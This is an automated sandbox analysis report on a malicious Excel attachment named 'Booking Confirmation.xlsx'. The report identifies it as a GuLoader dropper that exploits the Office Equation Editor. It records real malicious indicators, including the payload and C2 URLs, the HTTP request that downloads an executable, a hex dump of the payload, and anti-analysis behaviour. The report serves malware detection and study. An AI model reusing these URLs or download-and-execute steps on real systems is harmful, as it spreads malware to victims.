Loading ...

Play interactive tourEdit tour

Windows Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:Booking Confirmation.xlsx
Analysis ID:448719
MD5:870a4c72bccd58de144c7b845d56c626
SHA1:482681f75180bbb1286e1f93ce44dfae0b6b0007
SHA256:37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2668 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3056 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2552 cmdline: 'C:\Users\Public\vbc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\vbc.exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
        00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
              6.0.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

                Sigma Overview

                Exploits:

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3056, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3056, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2552
                Sigma detected: Execution from Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3056, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2552

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://180.214.239.39/port/.svchost.exeAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80
                Source: excel.exeMemory has grown: Private usage: 4MB later: 72MB

                Networking:

                barindex
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://ceattire.com/bin_UYDMbHwI28.bin
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 14 Jul 2021 14:55:35 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
                Source: global trafficHTTP traffic detected: GET /port/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E10AF3D.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /port/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
                Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
                Source: 3E10AF3D.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                Source: .svchost[1].exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: .svchost[1].exe.4.drString found in binary or memory: https://www.digicert.com/CPS0

                System Summary:

                barindex
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
                Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A54E7 NtAllocateVirtualMemory,
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A55AC NtAllocateVirtualMemory,
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A54E7
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7036
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A100E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4071
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A80D4
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2940
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2958
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A29B0
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2183
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A42CD
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A72C3
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B2D
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B1A
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7B73
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A1B5F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4B8E
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8385
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A43F1
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A341B
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A844C
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8C82
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A34C4
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8CD5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A350F
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A8D58
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7D52
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0EFE
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A3F0C
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7F03
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7F6D
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A0FB5
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A4785
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A2793
                Source: Booking Confirmation.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/11@0/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Booking Confirmation.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE916.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: Booking Confirmation.xlsxStatic file information: File size 1221992 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr
                Source: Booking Confirmation.xlsxInitial sample: OLE indicators vbamacros = False
                Source: Booking Confirmation.xlsxInitial sample: OLE indicators encrypted = True

                Data Obfuscation:

                barindex
                Yara detected GuLoaderShow sources
                Source: Yara matchFile source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                Yara detected GuLoaderShow sources
                Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED
                Source: C:\Users\Public\vbc.exeCode function: 6_2_0040495E push es; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221774 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221023 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00222823 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224023 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00227024 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00225825 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224833 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223033 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221833 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226034 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220038 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224803 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223003 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221803 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226004 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220008 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223813 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00225013 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00222014 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226814 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220818 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223063 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00221863 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00224863 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226065 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00220068 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00222074 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00223874 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00225074 push edx; ret
                Source: C:\Users\Public\vbc.exeCode function: 6_2_00226875 push edx; ret
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: Booking Confirmation.xlsxStream path 'EncryptedPackage' entropy: 7.99865188998 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
                Source: C:\Users\Public\vbc.exeCode function: 6_2_002A7036
